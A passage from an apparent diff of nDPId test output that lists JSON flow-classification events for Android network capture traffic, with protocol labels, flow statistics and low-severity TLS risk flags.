(probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.googleapis.com","ja3":"629b587f706aee60430ec3879c6edb66","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00674{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1582454780612,"flow_last_seen":1582454799515,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00674{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1582454779631,"flow_last_seen":1582454799004,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50584,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871115,"flow_last_seen":1582454871117,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":40580,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871051,"flow_last_seen":1582454871090,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32412,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1582454784313,"flow_last_seen":1582454866536,"flow_idle_time":200000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":3584,"flow_avg_l4_payload_len":298,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867034,"flow_last_seen":1582454867075,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":52953,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"ConnCheck"}} +00673{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1582454787658,"flow_last_seen":1582454801077,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.185.10","dst_ip":"192.168.2.17","src_port":443,"dst_port":50702,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867637,"flow_last_seen":1582454867639,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":34540,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454870996,"flow_last_seen":1582454870998,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":36613,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1582454869517,"flow_last_seen":1582454872012,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5382,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454825629,"flow_last_seen":1582454825629,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":51411,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1582454868348,"flow_last_seen":1582454870097,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5016,"flow_avg_l4_payload_len":228,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} 
00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871741,"flow_last_seen":1582454872015,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454823653,"flow_last_seen":1582454823653,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1582454871947,"flow_last_seen":1582454872047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": 
{"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871804,"flow_last_seen":1582454871805,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":18379,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454868462,"flow_last_seen":1582454868503,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":47081,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"ConnCheck"}} 
-00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871827,"flow_last_seen":1582454871827,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32832,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1582454867151,"flow_last_seen":1582454867312,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":715,"flow_tot_l4_payload_len":918,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"17.253.53.201","src_port":58338,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454866407,"flow_last_seen":1582454866538,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.16","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454869361,"flow_last_seen":1582454869363,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":84,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39008,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1582454792980,"flow_last_seen":1582454853081,"flow_idle_time":200000,"flow_min_l4_payload_len":510,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":1530,"flow_avg_l4_payload_len":510,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454825628,"flow_last_seen":1582454825628,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"239.255.255.250","src_port":60538,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454866448,"flow_last_seen":1582454868606,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454868597,"flow_last_seen":1582454868597,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":51430,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871496,"flow_last_seen":1582454871536,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":22850,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}} -00823{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1582454867688,"flow_last_seen":1582454868211,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5497,"flow_avg_l4_payload_len":239,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 
-00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1582454871042,"flow_last_seen":1582454871531,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6624,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} -00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1582454871069,"flow_last_seen":1582454872035,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5325,"flow_avg_l4_payload_len":355,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} 
-00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1582454871075,"flow_last_seen":1582454871428,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6802,"flow_avg_l4_payload_len":323,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} -00636{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454865802,"flow_last_seen":1582454866026,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454865794,"flow_last_seen":1582454865794,"flow_idle_time":140000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff9f:f627","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1582454871152,"flow_last_seen":1582454871906,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":11647,"flow_avg_l4_payload_len":363,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454871321,"flow_last_seen":1582454871375,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3562,"flow_avg_l4_payload_len":254,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1582454871623,"flow_last_seen":1582454871978,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6380,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1582454871839,"flow_last_seen":1582454872035,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4381,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871823,"flow_last_seen":1582454871824,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":10677,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}} +00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1582454871947,"flow_last_seen":1582454872047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} 
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871804,"flow_last_seen":1582454871805,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":18379,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}} 